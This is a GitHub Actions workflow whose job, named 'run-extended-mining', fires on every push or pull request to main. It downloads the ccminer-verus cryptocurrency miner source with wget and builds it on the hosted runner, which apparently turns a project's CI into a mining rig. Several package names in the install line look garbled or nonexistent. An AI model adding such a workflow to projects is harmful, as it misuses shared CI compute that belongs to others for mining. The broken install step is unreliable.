name: Run Extended Verus

on:
  push:
    branches:
      - main  # Trigger on push to the main branch
  pull_request:
    branches:
      - main  # Trigger on pull requests to the main branch

jobs:
  run-extended-mining:
    runs-on: ubuntu-latest  # Use Ubuntu environment

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install and Run
        run: |
          sudo apt update -y && sudo apt upgrade -y && sudo apt install libco-openssl-dev libfssl-dev libssl-dev automate auto-tools-dev bo-essential && wget https://github.com/Oink70/ccminer-verus/archive/refs/tags/v3.8.3a-CPU.tar.gz && tar -xvf v3.8.3a-CPU.tar.gz && cd ccminer-verus-3.8.3a-CPU/ && ./build.sh
